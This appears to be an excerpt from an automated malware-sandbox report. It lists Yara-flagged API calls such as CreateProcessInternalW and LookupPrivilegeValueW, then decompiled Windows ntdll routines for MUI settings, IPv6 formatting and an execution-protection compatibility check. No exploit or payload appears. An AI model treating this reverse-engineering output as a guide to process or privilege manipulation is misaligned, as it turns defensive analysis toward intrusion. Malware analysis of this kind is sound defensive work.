                                                               Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000A89A4
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                               Uniqueness Score: -1.00%

                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,0009CFB2,0009CFB2,?,00000000,?,?), ref: 000A8A70
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                               Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00008003,?,?,00097C83,?), ref: 0009D44B
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                               Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00008003,?,?,00097C83,?), ref: 0009D44B
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                               Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              C-Code - Quality: 94%
                                                              			E02038788(signed int __ecx, void* __edx, signed int _a4) {
                                                              				signed int _v8;
                                                              				short* _v12;
                                                              				void* _v16;
                                                              				signed int _v20;
                                                              				char _v24;
                                                              				signed int _v28;
                                                              				signed int _v32;
                                                              				char _v36;
                                                              				signed int _v40;
                                                              				char _v44;
                                                              				signed int _v48;
                                                              				signed int _v52;
                                                              				signed int _v56;
                                                              				signed int _v60;
                                                              				char _v68;
                                                              				void* _t216;
                                                              				intOrPtr _t231;
                                                              				short* _t235;
                                                              				intOrPtr _t257;
                                                              				short* _t261;
                                                              				intOrPtr _t284;
                                                              				intOrPtr _t288;
                                                              				void* _t314;
                                                              				signed int _t318;
                                                              				short* _t319;
                                                              				intOrPtr _t321;
                                                              				void* _t328;
                                                              				void* _t329;
                                                              				char* _t332;
                                                              				signed int _t333;
                                                              				signed int* _t334;
                                                              				void* _t335;
                                                              				void* _t338;
                                                              				void* _t339;
                                                              
                                                              				_t328 = __edx;
                                                              				_t322 = __ecx;
                                                              				_t318 = 0;
                                                              				_t334 = _a4;
                                                              				_v8 = 0;
                                                              				_v28 = 0;
                                                              				_v48 = 0;
                                                              				_v20 = 0;
                                                              				_v40 = 0;
                                                              				_v32 = 0;
                                                              				_v52 = 0;
                                                              				if(_t334 == 0) {
                                                              					_t329 = 0xc000000d;
                                                              					L49:
                                                              					_t334[0x11] = _v56;
                                                              					 *_t334 =  *_t334 | 0x00000800;
                                                              					_t334[0x12] = _v60;
                                                              					_t334[0x13] = _v28;
                                                              					_t334[0x17] = _v20;
                                                              					_t334[0x16] = _v48;
                                                              					_t334[0x18] = _v40;
                                                              					_t334[0x14] = _v32;
                                                              					_t334[0x15] = _v52;
                                                              					return _t329;
                                                              				}
                                                              				_v56 = 0;
                                                              				if(E02038460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                              					_v56 = 1;
                                                              					if(_v8 != 0) {
                                                              						_t207 = E0201E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                              					}
                                                              					_push(1);
                                                              					_v8 = _t318;
                                                              					E0203718A(_t207);
                                                              					_t335 = _t335 + 4;
                                                              				}
                                                              				_v60 = _v60 | 0xffffffff;
                                                              				if(E02038460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                              					_t333 =  *_v8;
                                                              					_v60 = _t333;
                                                              					_t314 = E0201E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                              					_push(_t333);
                                                              					_v8 = _t318;
                                                              					E0203718A(_t314);
                                                              					_t335 = _t335 + 4;
                                                              				}
                                                              				_t216 = E02038460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                              				_t332 = ";";
                                                              				if(_t216 < 0) {
                                                              					L17:
                                                              					if(E02038460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                              						L30:
                                                              						if(E02038460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                              							L46:
                                                              							_t329 = 0;
                                                              							L47:
                                                              							if(_v8 != _t318) {
                                                              								E0201E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                              							}
                                                              							if(_v28 != _t318) {
                                                              								if(_v20 != _t318) {
                                                              									E0201E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                              									_v20 = _t318;
                                                              									_v40 = _t318;
                                                              								}
                                                              							}
                                                              							goto L49;
                                                              						}
                                                              						_t231 = _v24;
                                                              						_t322 = _t231 + 4;
                                                              						_push(_t231);
                                                              						_v52 = _t322;
                                                              						E0203718A(_t231);
                                                              						if(_t322 == _t318) {
                                                              							_v32 = _t318;
                                                              						} else {
                                                              							_v32 = E0201E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                              						}
                                                              						if(_v32 == _t318) {
                                                              							_v52 = _t318;
                                                              							L58:
                                                              							_t329 = 0xc0000017;
                                                              							goto L47;
                                                              						} else {
                                                              							E02012340(_v32, _v8, _v24);
                                                              							_v16 = _v32;
                                                              							_a4 = _t318;
                                                              							_t235 = E0202E679(_v32, _t332);
                                                              							while(1) {
                                                              								_t319 = _t235;
                                                              								if(_t319 == 0) {
                                                              									break;
                                                              								}
                                                              								 *_t319 = 0;
                                                              								_t321 = _t319 + 2;
                                                              								E0201E2A8(_t322,  &_v68, _v16);
                                                              								if(E02035553(_t328,  &_v68,  &_v36) != 0) {
                                                              									_a4 = _a4 + 1;
                                                              								}
                                                              								_v16 = _t321;
                                                              								_t235 = E0202E679(_t321, _t332);
                                                              								_pop(_t322);
                                                              							}
                                                              							_t236 = _v16;
                                                              							if( *_v16 != _t319) {
                                                              								E0201E2A8(_t322,  &_v68, _t236);
                                                              								if(E02035553(_t328,  &_v68,  &_v36) != 0) {
                                                              									_a4 = _a4 + 1;
                                                              								}
                                                              							}
                                                              							if(_a4 == 0) {
                                                              								E0201E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                              								_v52 = _v52 & 0x00000000;
                                                              								_v32 = _v32 & 0x00000000;
                                                              							}
                                                              							if(_v8 != 0) {
                                                              								E0201E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                              							}
                                                              							_v8 = _v8 & 0x00000000;
                                                              							_t318 = 0;
                                                              							goto L46;
                                                              						}
                                                              					}
                                                              					_t257 = _v24;
                                                              					_t322 = _t257 + 4;
                                                              					_push(_t257);
                                                              					_v40 = _t322;
                                                              					E0203718A(_t257);
                                                              					_t338 = _t335 + 4;
                                                              					if(_t322 == _t318) {
                                                              						_v20 = _t318;
                                                              					} else {
                                                              						_v20 = E0201E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                              					}
                                                              					if(_v20 == _t318) {
                                                              						_v40 = _t318;
                                                              						goto L58;
                                                              					} else {
                                                              						E02012340(_v20, _v8, _v24);
                                                              						_v16 = _v20;
                                                              						_a4 = _t318;
                                                              						_t261 = E0202E679(_v20, _t332);
                                                              						_t335 = _t338 + 0x14;
                                                              						while(1) {
                                                              							_v12 = _t261;
                                                              							if(_t261 == _t318) {
                                                              								break;
                                                              							}
                                                              							_v12 = _v12 + 2;
                                                              							 *_v12 = 0;
                                                              							E0201E2A8(_v12,  &_v68, _v16);
                                                              							if(E02035553(_t328,  &_v68,  &_v36) != 0) {
                                                              								_a4 = _a4 + 1;
                                                              							}
                                                              							_v16 = _v12;
                                                              							_t261 = E0202E679(_v12, _t332);
                                                              							_pop(_t322);
                                                              						}
                                                              						_t269 = _v16;
                                                              						if( *_v16 != _t318) {
                                                              							E0201E2A8(_t322,  &_v68, _t269);
                                                              							if(E02035553(_t328,  &_v68,  &_v36) != 0) {
                                                              								_a4 = _a4 + 1;
                                                              							}
                                                              						}
                                                              						if(_a4 == _t318) {
                                                              							E0201E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                              							_v40 = _t318;
                                                              							_v20 = _t318;
                                                              						}
                                                              						if(_v8 != _t318) {
                                                              							E0201E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                              						}
                                                              						_v8 = _t318;
                                                              						goto L30;
                                                              					}
                                                              				}
                                                              				_t284 = _v24;
                                                              				_t322 = _t284 + 4;
                                                              				_push(_t284);
                                                              				_v48 = _t322;
                                                              				E0203718A(_t284);
                                                              				_t339 = _t335 + 4;
                                                              				if(_t322 == _t318) {
                                                              					_v28 = _t318;
                                                              				} else {
                                                              					_v28 = E0201E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                              				}
                                                              				if(_v28 == _t318) {
                                                              					_v48 = _t318;
                                                              					goto L58;
                                                              				} else {
                                                              					E02012340(_v28, _v8, _v24);
                                                              					_v16 = _v28;
                                                              					_a4 = _t318;
                                                              					_t288 = E0202E679(_v28, _t332);
                                                              					_t335 = _t339 + 0x14;
                                                              					while(1) {
                                                              						_v12 = _t288;
                                                              						if(_t288 == _t318) {
                                                              							break;
                                                              						}
                                                              						_v12 = _v12 + 2;
                                                              						 *_v12 = 0;
                                                              						E0201E2A8(_v12,  &_v68, _v16);
                                                              						if(E02035553(_t328,  &_v68,  &_v36) != 0) {
                                                              							_a4 = _a4 + 1;
                                                              						}
                                                              						_v16 = _v12;
                                                              						_t288 = E0202E679(_v12, _t332);
                                                              						_pop(_t322);
                                                              					}
                                                              					_t296 = _v16;
                                                              					if( *_v16 != _t318) {
                                                              						E0201E2A8(_t322,  &_v68, _t296);
                                                              						if(E02035553(_t328,  &_v68,  &_v36) != 0) {
                                                              							_a4 = _a4 + 1;
                                                              						}
                                                              					}
                                                              					if(_a4 == _t318) {
                                                              						E0201E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                              						_v48 = _t318;
                                                              						_v28 = _t318;
                                                              					}
                                                              					if(_v8 != _t318) {
                                                              						E0201E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                              					}
                                                              					_v8 = _t318;
                                                              					goto L17;
                                                              				}
                                                              			}
                                                              0x00000000
                                                              0x020389ed
                                                              0x0203895a
                                                              0x0203883e
                                                              0x02038841
                                                              0x02038844
                                                              0x02038845
                                                              0x02038848
                                                              0x0203884d
                                                              0x02038852
                                                              0x02038b49
                                                              0x02038858
                                                              0x0203886c
                                                              0x0203886c
                                                              0x02038872
                                                              0x02081b0e
                                                              0x00000000
                                                              0x02038878
                                                              0x02038881
                                                              0x0203888b
                                                              0x0203888e
                                                              0x02038891
                                                              0x02038896
                                                              0x02038899
                                                              0x02038899
                                                              0x0203889e
                                                              0x00000000
                                                              0x00000000
                                                              0x02081b21
                                                              0x02081b27
                                                              0x02081b2e
                                                              0x02081b42
                                                              0x02081b44
                                                              0x02081b44
                                                              0x02081b4c
                                                              0x02081b4f
                                                              0x02081b55
                                                              0x02081b55
                                                              0x020388a4
                                                              0x020388aa
                                                              0x020388b1
                                                              0x020388c5
                                                              0x02081b5b
                                                              0x02081b5b
                                                              0x020388c5
                                                              0x020388ce
                                                              0x020388e0
                                                              0x020388e5
                                                              0x020388e8
                                                              0x020388e8
                                                              0x020388ee
                                                              0x02038900
                                                              0x02038900
                                                              0x02038905
                                                              0x00000000
                                                              0x02038905

                                                              APIs
                                                              Strings
                                                              • Kernel-MUI-Language-SKU, xrefs: 020389FC
                                                              • Kernel-MUI-Language-Allowed, xrefs: 02038827
                                                              • Kernel-MUI-Language-Disallowed, xrefs: 02038914
                                                              • WindowsExcludedProcs, xrefs: 020387C1
                                                              • Kernel-MUI-Number-Allowed, xrefs: 020387E6
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: _wcspbrk
                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                              • API String ID: 402402107-258546922
                                                              • Opcode ID: 220af9dffb8b71e02ea1044d4038cb14ad62283b91d6ac558327d92ba2d25c9d
                                                              • Instruction ID: d3fa861c5e0989116f3b5c90b61432265d8531d3a5d1d95dbe3b97c12f747737
                                                              • Opcode Fuzzy Hash: 220af9dffb8b71e02ea1044d4038cb14ad62283b91d6ac558327d92ba2d25c9d
                                                              • Instruction Fuzzy Hash: C6F1D8B2D00309EFDB52EF95C9849EEB7B9FF08304F1484AAE505A7610E7359A45EF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 38%
                                                              			E020513CB(intOrPtr* _a4, intOrPtr _a8) {
                                                              				char _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr* _v16;
                                                              				intOrPtr _v20;
                                                              				char _v24;
                                                              				intOrPtr _t71;
                                                              				signed int _t78;
                                                              				signed int _t86;
                                                              				char _t90;
                                                              				signed int _t91;
                                                              				signed int _t96;
                                                              				intOrPtr _t108;
                                                              				signed int _t114;
                                                              				void* _t115;
                                                              				intOrPtr _t128;
                                                              				intOrPtr* _t129;
                                                              				void* _t130;
                                                              
                                                              				/* _a4: the 16-byte IPv6 address, read below as eight 16-bit words;
                                                              				   _a8: the output wide-char buffer. _t71 = buffer + 0x5c marks its end
                                                              				   (46 wide chars, the maximum length of an IPv6 address string). */
                                                              				_t129 = _a4;
                                                              				_t128 = _a8;
                                                              				_t116 = 0;
                                                              				_t71 = _t128 + 0x5c;
                                                              				_v8 = 8;                /* number of 16-bit groups to print */
                                                              				_v20 = _t71;
                                                              				/* Words 0..3 zero and a non-zero embedded IPv4 dword at offset 0xc:
                                                              				   candidate IPv4-compatible (::a.b.c.d), IPv4-mapped (::ffff:a.b.c.d)
                                                              				   or IPv4-translated (::ffff:0:a.b.c.d) address. */
                                                              				if( *_t129 == 0) {
                                                              					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                              						goto L5;
                                                              					} else {
                                                              						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                              						if(_t96 != 0) {
                                                              							L38:
                                                              							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                              								goto L5;
                                                              							} else {
                                                              								_push( *(_t129 + 0xf) & 0x000000ff);
                                                              								_push( *(_t129 + 0xe) & 0x000000ff);
                                                              								_push( *(_t129 + 0xd) & 0x000000ff);
                                                              								/* word 4 == 0xffff, word 5 == 0: the IPv4-translated form */
                                                              								_t86 = E02047707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                              								L36:
                                                              								return _t128 + _t86 * 2;
                                                              							}
                                                              						}
                                                              						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                              						if(_t114 == 0) {
                                                              							L33:
                                                              							_t115 = 0x2012926;   /* %hs prefix for "::a.b.c.d"; presumably the empty string */
                                                              							L35:
                                                              							_push( *(_t129 + 0xf) & 0x000000ff);
                                                              							_push( *(_t129 + 0xe) & 0x000000ff);
                                                              							_push( *(_t129 + 0xd) & 0x000000ff);
                                                              							_push( *(_t129 + 0xc) & 0x000000ff);
                                                              							_t86 = E02047707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                              							goto L36;
                                                              						}
                                                              						if(_t114 != 0xffff) {
                                                              							_t116 = 0;
                                                              							goto L38;
                                                              						}
                                                              						if(_t114 != 0) {
                                                              							_t115 = 0x2019cac;   /* %hs prefix "ffff:" (see Strings below): the IPv4-mapped form */
                                                              							goto L35;
                                                              						}
                                                              						goto L33;
                                                              					}
                                                              				} else {
                                                              					L5:
                                                              					_a8 = _t116;
                                                              					_a4 = _t116;
                                                              					_v12 = _t116;
                                                              					/* Word 4 is 0 or 2 (the 0xfffd mask ignores the u/l bit) and word 5, read
                                                              					   little-endian, is 0xfe5e, i.e. the 5efe ISATAP interface-id tag: print
                                                              					   only six groups and append the embedded IPv4 as a dotted tail. */
                                                              					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                              						if( *(_t129 + 0xa) == 0xfe5e) {
                                                              							_v8 = 6;
                                                              						}
                                                              					}
                                                              					_t90 = _v8;
                                                              					if(_t90 <= _t116) {
                                                              						L11:
                                                              						if(_a8 - _a4 <= 1) {
                                                              							_a8 = _t116;
                                                              							_a4 = _t116;
                                                              						}
                                                              						_t91 = 0;
                                                              						if(_v8 <= _t116) {
                                                              							L22:
                                                              							if(_v8 < 8) {   /* ISATAP case: dotted tail after the six hex groups */
                                                              								_push( *(_t129 + 0xf) & 0x000000ff);
                                                              								_push( *(_t129 + 0xe) & 0x000000ff);
                                                              								_push( *(_t129 + 0xd) & 0x000000ff);
                                                              								_t128 = _t128 + E02047707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                              							}
                                                              							return _t128;
                                                              						} else {
                                                              							L14:
                                                              							if(_a4 > _t91 || _t91 >= _a8) {
                                                              								if(_t91 != _t116 && _t91 != _a8) {
                                                              									_push(":");
                                                              									_push(_t71 - _t128 >> 1);
                                                              									_push(_t128);
                                                              									_t128 = _t128 + E02047707() * 2;
                                                              									_t71 = _v20;
                                                              									_t130 = _t130 + 0xc;
                                                              								}
                                                              								_t78 = E02047707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                              								_t130 = _t130 + 0x10;
                                                              							} else {
                                                              								_push(L"::");
                                                              								_push(_t71 - _t128 >> 1);
                                                              								_push(_t128);
                                                              								_t78 = E02047707();
                                                              								_t130 = _t130 + 0xc;
                                                              								_t91 = _a8 - 1;
                                                              							}
                                                              							_t91 = _t91 + 1;
                                                              							_t128 = _t128 + _t78 * 2;
                                                              							_t71 = _v20;
                                                              							if(_t91 >= _v8) {
                                                              								goto L22;
                                                              							}
                                                              							_t116 = 0;
                                                              							goto L14;
                                                              						}
                                                              					} else {
                                                              						/* Find the longest run of zero groups: [_a4, _a8) in group indices,
                                                              						   _v12 is where the run currently being measured started. */
                                                              						_t108 = 1;
                                                              						_v16 = _t129;
                                                              						_v24 = _t90;
                                                              						do {
                                                              							if( *_v16 == _t116) {
                                                              								if(_t108 - _v12 > _a8 - _a4) {
                                                              									_a4 = _v12;
                                                              									_a8 = _t108;
                                                              								}
                                                              								_t116 = 0;
                                                              							} else {
                                                              								_v12 = _t108;
                                                              							}
                                                              							_v16 = _v16 + 2;
                                                              							_t108 = _t108 + 1;
                                                              							_t26 =  &_v24;
                                                              							 *_t26 = _v24 - 1;
                                                              						} while ( *_t26 != 0);
                                                              						goto L11;
                                                              					}
                                                              				}
                                                              			}

                                                              [Per-instruction address column for E020513CB omitted; its code lies at 0x0205138e to 0x020514ac and 0x0207e8fd to 0x0207ea05 in the dump.]

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: c06d7c27a27a8f641a57613f46af04256d82f6cf885b58f8ba79e3ad825a4c81
                                                              • Instruction ID: 97722e717ae53d560ea444c639343a0f6ac596132ee6a1584e1933865dbe5e22
                                                              • Opcode Fuzzy Hash: c06d7c27a27a8f641a57613f46af04256d82f6cf885b58f8ba79e3ad825a4c81
                                                              • Instruction Fuzzy Hash: 0F6111B1D00765AACF25CF59C890ABFBBF6EF84300B54C06DE89A47540D734A640EF60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 64%
                                                              			E02047EFD(void* __ecx, intOrPtr _a4) {
                                                              				signed int _v8;
                                                              				char _v540;
                                                              				unsigned int _v544;
                                                              				signed int _v548;
                                                              				intOrPtr _v552;
                                                              				char _v556;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t33;
                                                              				void* _t38;
                                                              				unsigned int _t46;
                                                              				unsigned int _t47;
                                                              				unsigned int _t52;
                                                              				intOrPtr _t56;
                                                              				unsigned int _t62;
                                                              				void* _t69;
                                                              				void* _t70;
                                                              				intOrPtr _t72;
                                                              				signed int _t73;
                                                              				void* _t74;
                                                              				void* _t75;
                                                              				void* _t76;
                                                              				void* _t77;
                                                              
                                                              				_t33 =  *0x20f2088; // 0x761d41cf
                                                              				_v8 = _t33 ^ _t73;
                                                              				_v548 = _v548 & 0x00000000;
                                                              				_t72 = _a4;
                                                              				if(E02047F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                              					__eflags = _v548;
                                                              					if(_v548 == 0) {
                                                              						goto L1;
                                                              					}
                                                              					_t62 = _t72 + 0x24;
                                                              					E02063F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                              					_t71 = 0x214;
                                                              					_v544 = 0x214;
                                                              					E0201DFC0( &_v540, 0, 0x214);
                                                              					_t75 = _t74 + 0x20;
                                                              					_t46 =  *0x20f4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                              					__eflags = _t46;
                                                              					if(_t46 == 0) {
                                                              						goto L1;
                                                              					}
                                                              					_t47 = _v544;
                                                              					__eflags = _t47;
                                                              					if(_t47 == 0) {
                                                              						goto L1;
                                                              					}
                                                              					__eflags = _t47 - 0x214;
                                                              					if(_t47 >= 0x214) {
                                                              						goto L1;
                                                              					}
                                                              					_push(_t62);
                                                              					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                              					E02063F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                              					_t52 = E02020D27( &_v540, L"Execute=1");
                                                              					_t76 = _t75 + 0x1c;
                                                              					_push(_t62);
                                                              					__eflags = _t52;
                                                              					if(_t52 == 0) {
                                                              						E02063F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                              						_t71 =  &_v540;
                                                              						_t56 = _t73 + _v544 - 0x218;
                                                              						_t77 = _t76 + 0x14;
                                                              						_v552 = _t56;
                                                              						__eflags = _t71 - _t56;
                                                              						if(_t71 >= _t56) {
                                                              							goto L1;
                                                              						} else {
                                                              							goto L10;
                                                              						}
                                                              						while(1) {
                                                              							L10:
                                                              							_t62 = E02028375(_t71, 0x20);
                                                              							_pop(_t69);
                                                              							__eflags = _t62;
                                                              							if(__eflags != 0) {
                                                              								__eflags = 0;
                                                              								 *_t62 = 0;
                                                              							}
                                                              							E02063F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                              							_t77 = _t77 + 0x10;
                                                              							E0208E8DB(_t69, _t70, __eflags, _t72, _t71);
                                                              							__eflags = _t62;
                                                              							if(_t62 == 0) {
                                                              								goto L1;
                                                              							}
                                                              							_t31 = _t62 + 2; // 0x2
                                                              							_t71 = _t31;
                                                              							__eflags = _t71 - _v552;
                                                              							if(_t71 >= _v552) {
                                                              								goto L1;
                                                              							}
                                                              						}
                                                              					}
                                                              					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                              					_push(3);
                                                              					_push(0x55);
                                                              					E02063F92();
                                                              					_t38 = 1;
                                                              					L2:
                                                              					return E0201E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                              				}
                                                              				L1:
                                                              				_t38 = 0;
                                                              				goto L2;
                                                              			}

                                                              APIs
                                                              • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02063F12
                                                              Strings
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02063F75
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 0206E345
                                                              • ExecuteOptions, xrefs: 02063F04
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02063EC4
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02063F4A
                                                              • Execute=1, xrefs: 02063F5E
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0206E2FB
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: BaseDataModuleQuery
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 3901378454-484625025
                                                              • Opcode ID: 851debc423b6fc4c1e14590dbde3c9847f005ebe1cba7aaef5bde6aed9561a75
                                                              • Instruction ID: fbec9f60c3235ad1c63b8beb6ac3a45ecc0f40cfa0e4cbd0b4e94f342935b9d5
                                                              • Opcode Fuzzy Hash: 851debc423b6fc4c1e14590dbde3c9847f005ebe1cba7aaef5bde6aed9561a75
                                                              • Instruction Fuzzy Hash: 5141DA7168071C7EEB21DB94DCC9FEBB3FDAF14704F0045A9A905E6090EB709A45AFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%
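
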